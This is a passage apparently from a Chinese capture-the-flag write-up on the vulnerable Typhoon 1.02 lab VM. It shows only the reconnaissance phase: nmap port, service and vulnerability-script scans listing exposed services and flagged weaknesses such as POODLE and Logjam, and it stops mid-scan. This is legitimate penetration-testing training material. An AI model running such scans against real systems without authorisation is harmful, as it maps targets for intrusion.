TYPHOON_1_02 靶机

信息收集

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.121
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-01 11:44 EDT
Nmap scan report for 192.168.56.121
Host is up (0.00028s latency).
Not shown: 65511 closed tcp ports (reset)
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
25/tcp    open  smtp
53/tcp    open  domain
80/tcp    open  http
110/tcp   open  pop3
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
143/tcp   open  imap
445/tcp   open  microsoft-ds
631/tcp   open  ipp
993/tcp   open  imaps
995/tcp   open  pop3s
2049/tcp  open  nfs
3306/tcp  open  mysql
5432/tcp  open  postgresql
6379/tcp  open  redis
8080/tcp  open  http-proxy
27017/tcp open  mongod
34114/tcp open  unknown
34329/tcp open  unknown
41559/tcp open  unknown
43004/tcp open  unknown
49357/tcp open  unknown
MAC Address: 08:00:27:2D:C0:8F (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 8.53 seconds

端口开放了好多……慢慢抽丝剥茧吧

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p21,22,25,53,80,110,111,139,143,445,631,993,995,2049,3306,5432,6379,8080,27017,34114,34329,41559,43004,49357 192.168.56.121
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-01 11:48 EDT
Nmap scan report for 192.168.56.121
Host is up (0.00030s latency).

PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 3.0.2
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.56.106
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp    open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 02:df:b3:1b:01:dc:5e:fd:f9:96:d7:5b:b7:d6:7b:f9 (DSA)
|   2048 de:af:76:27:90:2a:8f:cf:0b:2f:22:f8:42:36:07:dd (RSA)
|   256 70:ae:36:6c:42:7d:ed:1b:c0:40:fc:2d:00:8d:87:11 (ECDSA)
|_  256 bb:ce:f2:98:64:f7:8f:ae:f0:dd:3c:23:3b:a6:0f:61 (ED25519)
25/tcp    open  smtp        Postfix smtpd
|_ssl-date: TLS randomness does not represent time
|_smtp-commands: typhoon, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
| ssl-cert: Subject: commonName=typhoon
| Not valid before: 2018-10-22T19:38:20
|_Not valid after:  2028-10-19T19:38:20
53/tcp    open  domain      ISC BIND 9.9.5-3 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.9.5-3-Ubuntu
80/tcp    open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-title: Typhoon Vulnerable VM by PRISMA CSI
| http-robots.txt: 1 disallowed entry 
|_/mongoadmin/
|_http-server-header: Apache/2.4.7 (Ubuntu)
110/tcp   open  pop3        Dovecot pop3d
|_pop3-capabilities: TOP RESP-CODES UIDL SASL STLS PIPELINING CAPA AUTH-RESP-CODE
| ssl-cert: Subject: commonName=typhoon/organizationName=Dovecot mail server
| Not valid before: 2018-10-22T19:38:49
|_Not valid after:  2028-10-21T19:38:49
|_ssl-date: TLS randomness does not represent time
111/tcp   open  rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100003  2,3,4       2049/udp   nfs
|   100003  2,3,4       2049/udp6  nfs
|   100005  1,2,3      43189/tcp6  mountd
|   100005  1,2,3      47958/udp   mountd
|   100005  1,2,3      49357/tcp   mountd
|   100005  1,2,3      58024/udp6  mountd
|   100021  1,3,4      41979/tcp6  nlockmgr
|   100021  1,3,4      43004/tcp   nlockmgr
|   100021  1,3,4      56771/udp   nlockmgr
|   100021  1,3,4      57546/udp6  nlockmgr
|   100024  1          34114/tcp   status
|   100024  1          42529/udp6  status
|   100024  1          51309/tcp6  status
|   100024  1          58257/udp   status
|   100227  2,3         2049/tcp   nfs_acl
|   100227  2,3         2049/tcp6  nfs_acl
|   100227  2,3         2049/udp   nfs_acl
|_  100227  2,3         2049/udp6  nfs_acl
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp   open  imap        Dovecot imapd (Ubuntu)
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: more STARTTLS LITERAL+ IMAP4rev1 post-login have listed LOGIN-REFERRALS OK capabilities Pre-login ENABLE LOGINDISABLEDA0001 IDLE SASL-IR ID
| ssl-cert: Subject: commonName=typhoon/organizationName=Dovecot mail server
| Not valid before: 2018-10-22T19:38:49
|_Not valid after:  2028-10-21T19:38:49
445/tcp   open  netbios-ssn Samba smbd 4.1.6-Ubuntu (workgroup: WORKGROUP)
631/tcp   open  ipp         CUPS 1.7
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: CUPS/1.7 IPP/2.1
| http-methods: 
|_  Potentially risky methods: PUT
|_http-title: Home - CUPS 1.7.2
993/tcp   open  ssl/imap    Dovecot imapd (Ubuntu)
|_imap-capabilities: more AUTH=PLAINA0001 IMAP4rev1 post-login have listed LOGIN-REFERRALS OK capabilities Pre-login ENABLE ID IDLE SASL-IR LITERAL+
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=typhoon/organizationName=Dovecot mail server
| Not valid before: 2018-10-22T19:38:49
|_Not valid after:  2028-10-21T19:38:49
995/tcp   open  ssl/pop3    Dovecot pop3d
| ssl-cert: Subject: commonName=typhoon/organizationName=Dovecot mail server
| Not valid before: 2018-10-22T19:38:49
|_Not valid after:  2028-10-21T19:38:49
|_pop3-capabilities: TOP RESP-CODES UIDL SASL(PLAIN) USER PIPELINING CAPA AUTH-RESP-CODE
|_ssl-date: TLS randomness does not represent time
2049/tcp  open  nfs         2-4 (RPC #100003)
3306/tcp  open  mysql       MySQL (unauthorized)
5432/tcp  open  postgresql  PostgreSQL DB 9.3.3 - 9.3.5
| ssl-cert: Subject: commonName=typhoon
| Not valid before: 2018-10-22T19:38:20
|_Not valid after:  2028-10-19T19:38:20
|_ssl-date: TLS randomness does not represent time
6379/tcp  open  redis       Redis key-value store 4.0.11
8080/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-open-proxy: Proxy might be redirecting requests
| http-methods: 
|_  Potentially risky methods: PUT DELETE
|_http-title: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
27017/tcp open  mongodb     MongoDB 3.0.15 3.0.15
| mongodb-info: 
|   MongoDB Build info
|     OpenSSLVersion = OpenSSL 1.0.1f 6 Jan 2014
|     loaderFlags = 
|     bits = 64
|     ok = 1.0
|     versionArray
|       3 = 0
|       0 = 3
|       1 = 0
|       2 = 15
|     allocator = tcmalloc
|     maxBsonObjectSize = 16777216
|     compilerFlags = -Wnon-virtual-dtor -Woverloaded-virtual -std=c++11 -fno-omit-frame-pointer -fPIC -fno-strict-aliasing -ggdb -pthread -Wall -Wsign-compare -Wno-unknown-pragmas -Winvalid-pch -pipe -Werror -O3 -Wno-unused-local-typedefs -Wno-unused-function -Wno-deprecated-declarations -Wno-unused-but-set-variable -Wno-missing-braces -fno-builtin-memcmp -std=c99
|     debug = false
|     javascriptEngine = V8
|     version = 3.0.15
|     gitVersion = b8ff507269c382bc100fc52f75f48d54cd42ec3b
|     sysInfo = Linux ip-10-71-195-23 3.13.0-24-generic #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014 x86_64 BOOST_LIB_VERSION=1_49
|   Server status
|     ok = 1.0
|     cursors
|       timedOut = 0
|       totalOpen = 0
|       pinned = 0
|       totalNoTimeout = 0
|       clientCursors_size = 0
|       note = deprecated, use server status metrics
|     process = mongod
|     uptimeMillis = 356783
|     extra_info
|       heap_usage_bytes = 63081592
|       page_faults = 171
|       note = fields vary by platform
|     globalLock
|       activeClients
|         writers = 0
|         total = 10
|         readers = 0
|       currentQueue
|         writers = 0
|         total = 0
|         readers = 0
|       totalTime = 356773000
|     connections
|       totalCreated = 4
|       available = 51198
|       current = 2
|     locks
|       Database
|         acquireCount
|           W = 9
|           r = 646
|           R = 2
|       MMAPV1Journal
|         acquireCount
|           w = 22
|           R = 3287
|           r = 646
|       Global
|         timeAcquiringMicros
|           r = 1025
|         acquireCount
|           w = 9
|           W = 5
|           r = 1310
|         acquireWaitCount
|           r = 1
|       Collection
|         acquireCount
|           R = 669
|     dur
|       journaledMB = 0.0
|       timeMs
|         writeToDataFiles = 0
|         prepLogBuffer = 0
|         remapPrivateView = 0
|         commits = 0
|         dt = 3040
|         writeToJournal = 0
|         commitsInWriteLock = 0
|       commits = 28
|       compression = 0.0
|       writeToDataFilesMB = 0.0
|       earlyCommits = 0
|       commitsInWriteLock = 0
|     writeBacksQueued = false
|     mem
|       resident = 67
|       supported = true
|       mappedWithJournal = 320
|       bits = 64
|       virtual = 515
|       mapped = 160
|     pid = 1312
|     uptimeEstimate = 298.0
|     metrics
|       repl
|         apply
|           ops = 0
|           batches
|             totalMillis = 0
|             num = 0
|         preload
|           indexes
|             totalMillis = 0
|             num = 0
|           docs
|             totalMillis = 0
|             num = 0
|         buffer
|           count = 0
|           sizeBytes = 0
|           maxSizeBytes = 268435456
|         network
|           readersCreated = 0
|           ops = 0
|           bytes = 0
|           getmores
|             totalMillis = 0
|             num = 0
|       cursor
|         open
|           noTimeout = 0
|           total = 0
|           pinned = 0
|         timedOut = 0
|       ttl
|         deletedDocuments = 0
|         passes = 5
|       queryExecutor
|         scanned = 0
|         scannedObjects = 0
|       getLastError
|         wtimeouts = 0
|         wtime
|           totalMillis = 0
|           num = 0
|       commands
|         _isSelf
|           failed = 0
|           total = 0
|         grantRolesToRole
|           failed = 0
|           total = 0
|         findAndModify
|           failed = 0
|           total = 0
|         buildInfo
|           failed = 0
|           total = 0
|         getPrevError
|           failed = 0
|           total = 0
|         copydb
|           failed = 0
|           total = 0
|         copydbsaslstart
|           failed = 0
|           total = 0
|         explain
|           failed = 0
|           total = 0
|         connectionStatus
|           failed = 0
|           total = 0
|         shardingState
|           failed = 0
|           total = 0
|         rolesInfo
|           failed = 0
|           total = 0
|         mergeChunks
|           failed = 0
|           total = 0
|         _getUserCacheGeneration
|           failed = 0
|           total = 0
|         revokeRolesFromUser
|           failed = 0
|           total = 0
|         dropAllUsersFromDatabase
|           failed = 0
|           total = 0
|         applyOps
|           failed = 0
|           total = 0
|         replSetFreeze
|           failed = 0
|           total = 0
|         moveChunk
|           failed = 0
|           total = 0
|         group
|           failed = 0
|           total = 0
|         logRotate
|           failed = 0
|           total = 0
|         currentOpCtx
|           failed = 0
|           total = 0
|         dropUser
|           failed = 0
|           total = 0
|         writebacklisten
|           failed = 0
|           total = 0
|         serverStatus
|           failed = 0
|           total = 2
|         replSetSyncFrom
|           failed = 0
|           total = 0
|         authSchemaUpgrade
|           failed = 0
|           total = 0
|         geoNear
|           failed = 0
|           total = 0
|         insert
|           failed = 0
|           total = 0
|         connPoolStats
|           failed = 0
|           total = 0
|         cloneCollectionAsCapped
|           failed = 0
|           total = 0
|         getParameter
|           failed = 0
|           total = 0
|         saslContinue
|           failed = 0
|           total = 0
|         grantPrivilegesToRole
|           failed = 0
|           total = 0
|         usersInfo
|           failed = 0
|           total = 0
|         forceerror
|           failed = 0
|           total = 0
|         dataSize
|           failed = 0
|           total = 0
|         touch
|           failed = 0
|           total = 0
|         replSetInitiate
|           failed = 0
|           total = 0
|         repairDatabase
|           failed = 0
|           total = 0
|         planCacheClear
|           failed = 0
|           total = 0
|         availableQueryOptions
|           failed = 0
|           total = 0
|         repairCursor
|           failed = 0
|           total = 0
|         drop
|           failed = 0
|           total = 0
|         copydbgetnonce
|           failed = 0
|           total = 0
|         replSetUpdatePosition
|           failed = 0
|           total = 0
|         updateRole
|           failed = 0
|           total = 0
|         dropAllRolesFromDatabase
|           failed = 0
|           total = 0
|         appendOplogNote
|           failed = 0
|           total = 0
|         setParameter
|           failed = 0
|           total = 0
|         getShardVersion
|           failed = 0
|           total = 0
|         top
|           failed = 0
|           total = 0
|         setShardVersion
|           failed = 0
|           total = 0
|         dropDatabase
|           failed = 0
|           total = 0
|         updateUser
|           failed = 0
|           total = 0
|         listCollections
|           failed = 0
|           total = 0
|         _recvChunkAbort
|           failed = 0
|           total = 0
|         replSetHeartbeat
|           failed = 0
|           total = 0
|         revokePrivilegesFromRole
|           failed = 0
|           total = 0
|         planCacheSetFilter
|           failed = 0
|           total = 0
|         replSetStepDown
|           failed = 0
|           total = 0
|         getnonce
|           failed = 0
|           total = 0
|         createIndexes
|           failed = 0
|           total = 0
|         getCmdLineOpts
|           failed = 0
|           total = 0
|         planCacheListQueryShapes
|           failed = 0
|           total = 0
|         getLog
|           failed = 0
|           total = 0
|         replSetElect
|           failed = 0
|           total = 0
|         planCacheClearFilters
|           failed = 0
|           total = 0
|         clone
|           failed = 0
|           total = 0
|         <UNKNOWN> = 0
|         parallelCollectionScan
|           failed = 0
|           total = 0
|         dbStats
|           failed = 0
|           total = 0
|         dropIndexes
|           failed = 0
|           total = 0
|         splitChunk
|           failed = 0
|           total = 0
|         _migrateClone
|           failed = 0
|           total = 0
|         connPoolSync
|           failed = 0
|           total = 0
|         saslStart
|           failed = 0
|           total = 0
|         delete
|           failed = 0
|           total = 0
|         find
|           failed = 0
|           total = 0
|         replSetGetRBID
|           failed = 0
|           total = 0
|         shutdown
|           failed = 0
|           total = 0
|         whatsmyuri
|           failed = 0
|           total = 0
|         ping
|           failed = 0
|           total = 0
|         mapreduce
|           shardedfinish
|             failed = 0
|             total = 0
|         handshake
|           failed = 0
|           total = 0
|         invalidateUserCache
|           failed = 0
|           total = 0
|         unsetSharding
|           failed = 0
|           total = 0
|         create
|           failed = 0
|           total = 0
|         logout
|           failed = 0
|           total = 0
|         hostInfo
|           failed = 0
|           total = 0
|         count
|           failed = 0
|           total = 0
|         replSetMaintenance
|           failed = 0
|           total = 0
|         reIndex
|           failed = 0
|           total = 0
|         splitVector
|           failed = 0
|           total = 0
|         eval
|           failed = 0
|           total = 0
|         update
|           failed = 0
|           total = 0
|         listDatabases
|           failed = 0
|           total = 1
|         planCacheListPlans
|           failed = 0
|           total = 0
|         createRole
|           failed = 0
|           total = 0
|         cursorInfo
|           failed = 0
|           total = 0
|         validate
|           failed = 0
|           total = 0
|         resetError
|           failed = 0
|           total = 0
|         mapReduce
|           failed = 0
|           total = 0
|         isMaster
|           failed = 0
|           total = 0
|         listCommands
|           failed = 0
|           total = 0
|         _transferMods
|           failed = 0
|           total = 0
|         filemd5
|           failed = 0
|           total = 0
|         profile
|           failed = 0
|           total = 0
|         replSetGetConfig
|           failed = 0
|           total = 0
|         createUser
|           failed = 0
|           total = 0
|         collMod
|           failed = 0
|           total = 0
|         diagLogging
|           failed = 0
|           total = 0
|         medianKey
|           failed = 0
|           total = 0
|         dbHash
|           failed = 0
|           total = 0
|         driverOIDTest
|           failed = 0
|           total = 0
|         replSetReconfig
|           failed = 0
|           total = 0
|         _recvChunkStatus
|           failed = 0
|           total = 0
|         checkShardingIndex
|           failed = 0
|           total = 0
|         aggregate
|           failed = 0
|           total = 0
|         _recvChunkCommit
|           failed = 0
|           total = 0
|         cleanupOrphaned
|           failed = 0
|           total = 0
|         grantRolesToUser
|           failed = 0
|           total = 0
|         revokeRolesFromRole
|           failed = 0
|           total = 0
|         geoSearch
|           failed = 0
|           total = 0
|         getShardMap
|           failed = 0
|           total = 0
|         _recvChunkStart
|           failed = 0
|           total = 0
|         resync
|           failed = 0
|           total = 0
|         getLastError
|           failed = 0
|           total = 0
|         cloneCollection
|           failed = 0
|           total = 0
|         replSetGetStatus
|           failed = 0
|           total = 0
|         planCacheListFilters
|           failed = 0
|           total = 0
|         _mergeAuthzCollections
|           failed = 0
|           total = 0
|         listIndexes
|           failed = 0
|           total = 0
|         authenticate
|           failed = 0
|           total = 0
|         features
|           failed = 0
|           total = 0
|         shardConnPoolStats
|           failed = 0
|           total = 0
|         compact
|           failed = 0
|           total = 0
|         fsync
|           failed = 0
|           total = 0
|         collStats
|           failed = 0
|           total = 0
|         convertToCapped
|           failed = 0
|           total = 0
|         renameCollection
|           failed = 0
|           total = 0
|         distinct
|           failed = 0
|           total = 0
|         replSetFresh
|           failed = 0
|           total = 0
|         dropRole
|           failed = 0
|           total = 0
|       operation
|         fastmod = 0
|         writeConflicts = 0
|         idhack = 0
|         scanAndOrder = 0
|       record
|         moves = 0
|       storage
|         freelist
|           search
|             requests = 0
|             scanned = 0
|             bucketExhausted = 0
|       document
|         deleted = 0
|         inserted = 0
|         returned = 0
|         updated = 0
|     network
|       numRequests = 2
|       bytesOut = 10166
|       bytesIn = 128
|     opcountersRepl
|       command = 0
|       insert = 0
|       update = 0
|       query = 0
|       delete = 0
|       getmore = 0
|     backgroundFlushing
|       last_ms = 0
|       last_finished = 1688255256082
|       flushes = 5
|       total_ms = 1
|       average_ms = 0.2
|     host = typhoon.local
|     opcounters
|       command = 3
|       insert = 0
|       update = 0
|       query = 1
|       delete = 0
|       getmore = 0
|     uptime = 357.0
|     storageEngine
|       name = mmapv1
|     version = 3.0.15
|     asserts
|       msg = 0
|       regular = 0
|       warning = 0
|       rollovers = 0
|       user = 0
|_    localTime = 1688255312772
| mongodb-databases: 
|   ok = 1.0
|   totalSize = 167772160.0
|   databases
|     1
|       name = local
|       empty = false
|       sizeOnDisk = 83886080.0
|     0
|       name = credentials
|       empty = false
|_      sizeOnDisk = 83886080.0
34114/tcp open  status      1 (RPC #100024)
34329/tcp open  mountd      1-3 (RPC #100005)
41559/tcp open  mountd      1-3 (RPC #100005)
43004/tcp open  nlockmgr    1-4 (RPC #100021)
49357/tcp open  mountd      1-3 (RPC #100005)
MAC Address: 08:00:27:2D:C0:8F (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Hosts:  typhoon, TYPHOON; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb2-security-mode: 
|   3:0:0: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: TYPHOON, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time: 
|   date: 2023-07-01T23:48:32
|_  start_date: N/A
|_clock-skew: mean: 6h59m55s, deviation: 1h43m55s, median: 7h59m54s
| smb-os-discovery: 
|   OS: Unix (Samba 4.1.6-Ubuntu)
|   Computer name: typhoon
|   NetBIOS computer name: TYPHOON\x00
|   Domain name: local
|   FQDN: typhoon.local
|_  System time: 2023-07-02T02:48:32+03:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.81 seconds

emmm，信息好多啊，把漏洞脚本扫描一起做了，再进行分析吧

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p21,22,25,53,80,110,111,139,143,445,631,993,995,2049,3306,5432,6379,8080,27017,34114,34329,41559,43004,49357 192.168.56.121

[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-02 01:56 EDT
Nmap scan report for 192.168.56.121
Host is up (0.00013s latency).

PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
25/tcp    open  smtp
| ssl-dh-params: 
|   VULNERABLE:
|   Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use anonymous
|       Diffie-Hellman key exchange only provide protection against passive
|       eavesdropping, and are vulnerable to active man-in-the-middle attacks
|       which could completely compromise the confidentiality and integrity
|       of any data exchanged over the resulting session.
|     Check results:
|       ANONYMOUS DH GROUP 1
|             Cipher Suite: TLS_DH_anon_WITH_SEED_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: postfix builtin
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|       https://www.ietf.org/rfc/rfc2246.txt
|   
|   Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2015-4000  BID:74733
|       The Transport Layer Security (TLS) protocol contains a flaw that is
|       triggered when handling Diffie-Hellman key exchanges defined with
|       the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
|       to downgrade the security of a TLS session to 512-bit export-grade
|       cryptography, which is significantly weaker, allowing the attacker
|       to more easily break the encryption and monitor or tamper with
|       the encrypted stream.
|     Disclosure date: 2015-5-19
|     Check results:
|       EXPORT-GRADE DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 512
|             Generator Length: 8
|             Public Key Length: 512
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
|       https://www.securityfocus.com/bid/74733
|       https://weakdh.org
|   
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_SEED_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: postfix builtin
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2014-3566  BID:70574
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|       TLS_FALLBACK_SCSV properly implemented
|     References:
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://www.securityfocus.com/bid/70574
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| smtp-vuln-cve2010-4344: 
|_  The SMTP server is not Exim: NOT VULNERABLE
53/tcp    open  domain
80/tcp    open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /robots.txt: Robots file
|_  /phpmyadmin/: phpMyAdmin
| http-fileupload-exploiter: 
|   
|     Couldn't find a file-type field.
|   
|_    Couldn't find a file-type field.
110/tcp   open  pop3
| ssl-dh-params: 
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_SEED_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2014-3566  BID:70574
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|       TLS_FALLBACK_SCSV properly implemented
|     References:
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://www.securityfocus.com/bid/70574
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
143/tcp   open  imap
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2014-3566  BID:70574
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|       TLS_FALLBACK_SCSV properly implemented
|     References:
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://www.securityfocus.com/bid/70574
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| ssl-dh-params: 
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_SEED_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
445/tcp   open  microsoft-ds
631/tcp   open  ipp
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: VULNERABLE
|     IDs:  CVE:CVE-2014-3566  BID:70574
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|     References:
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://www.securityfocus.com/bid/70574
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
993/tcp   open  imaps
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2014-3566  BID:70574
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|       TLS_FALLBACK_SCSV properly implemented
|     References:
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://www.securityfocus.com/bid/70574
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
| ssl-dh-params: 
|   VULNERABLE:
|   Diffie-Hellman Key Exchange Insufficient Group Strength
|     State: VULNERABLE
|       Transport Layer Security (TLS) services that use Diffie-Hellman groups
|       of insufficient strength, especially those using one of a few commonly
|       shared groups, may be susceptible to passive eavesdropping attacks.
|     Check results:
|       WEAK DH GROUP 1
|             Cipher Suite: TLS_DHE_RSA_WITH_SEED_CBC_SHA
|             Modulus Type: Safe prime
|             Modulus Source: Unknown/Custom-generated
|             Modulus Length: 1024
|             Generator Length: 8
|             Public Key Length: 1024
|     References:
|_      https://weakdh.org
995/tcp   open  pop3s
| ssl-poodle: 
|   VULNERABLE:
|   SSL POODLE information leak
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2014-3566  BID:70574
|           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
|           products, uses nondeterministic CBC padding, which makes it easier
|           for man-in-the-middle attackers to obtain cleartext data via a
|           padding-oracle attack, aka the "POODLE" issue.
|     Disclosure date: 2014-10-14
|     Check results:
|       TLS_RSA_WITH_AES_128_CBC_SHA
|       TLS_FALLBACK_SCSV properly implemented
|     References:
|       https://www.imperialviolet.org/2014/10/14/poodle.html
|       https://www.securityfocus.com/bid/70574
|       https://www.openssl.org/~bodo/ssl-poodle.pdf
